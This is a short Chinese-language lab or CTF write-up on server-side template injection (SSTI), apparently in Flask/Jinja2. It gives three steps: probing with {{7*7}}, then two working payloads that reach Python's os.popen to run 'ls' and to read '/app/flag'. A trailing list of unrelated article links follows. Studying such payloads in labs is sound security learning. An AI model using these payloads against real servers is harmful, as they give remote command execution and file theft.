實驗說明 - ssti

Yolololololo發表於2024-07-24

實驗名稱

簡單的ssti

實驗簡介

是一種針對伺服器端模板的注入漏洞。

實驗說明

攻擊者將惡意程式碼輸入到模板伺服器在執行時未對惡意程式碼進行處理就輸出執行

將字串當作模板執行

ssti注入就是使其渲染我們想要執行的的字串

實驗步驟

步驟一：

輸入 {{7*7}}判斷型別

步驟二：

{{url_for.__globals__.__builtins__['__import__']('os').popen('ls').read()}}

步驟三：

{{' '.__class__.__base__.__subclasses__()[133].__init__.__globals__['popen']('cat /app/flag').read()}}

資料庫克隆實驗系列-環境說明
2014-04-02
資料庫
SSTI
2024-06-01
網路對抗實驗一逆向及Bof基礎實踐說明
2024-03-14
CRC校驗原理簡介及C程式碼實現說明
2021-06-03
C程式
實驗樓原型設計-3-系統驗證及常用命令說明
2020-11-28
原型
JDK 20 搶先體驗發行說明
2022-11-19
JDK
實驗說明為什麼DataGuard需要設定force logging
2015-06-01
BUUCTF SSTI模板注入
2024-05-26
Redis Sentinel 高可用實現說明
2016-06-20
Redis
MongoDB資料檔案備份與恢復詳解及實驗說明
2016-03-31
MongoDB
SYSAUX 說明
2016-01-12
UX
PDM系統的實施說明書
2018-11-14
專利說明書及其說明書附圖
2024-07-24
人機驗證reCAPTCHA v3使用完備說明
2022-04-21
APT
用Excel做資料說明――抽樣說明工具
2016-09-27
Excel
openssh版本更新與說明 openssl版本更新與說明
2024-08-20
WebApiClientCore使用說明
2020-05-22
WebAPIclient
QLExpress使用說明
2019-10-11
Express
postman 使用說明
2019-09-30
Postman
SDWebImage中文說明
2019-03-03
Web
objc物件說明
2018-10-06
OBJ物件
MOBIM介面說明
2018-09-29
git 操作說明
2018-12-22
Git
Oracle Latch 說明
2018-06-27
Oracle
Oracle Namespace 說明
2017-07-10
Oraclenamespace
埠號說明
2017-11-13
Kafka配置說明
2016-04-14
Kafka
zookeeper埠說明
2017-12-20
Oracle 版本說明
2014-10-03
Oracle
常用埠說明
2013-08-15
DBV工具說明
2015-12-07
Sqlite使用說明
2008-09-09
SQLite
FTP配置說明
2016-02-29
FTP
dd命令說明
2007-01-27
mysql 版本說明
2011-09-16
MySql
rust配置說明
2024-06-21
Rust
certbot 使用說明
2024-09-01
xming工具的簡單實用說明
2011-03-05

實驗說明 - ssti

實驗名稱

實驗簡介

實驗說明

實驗步驟

步驟一：

步驟二：

步驟三：

相關文章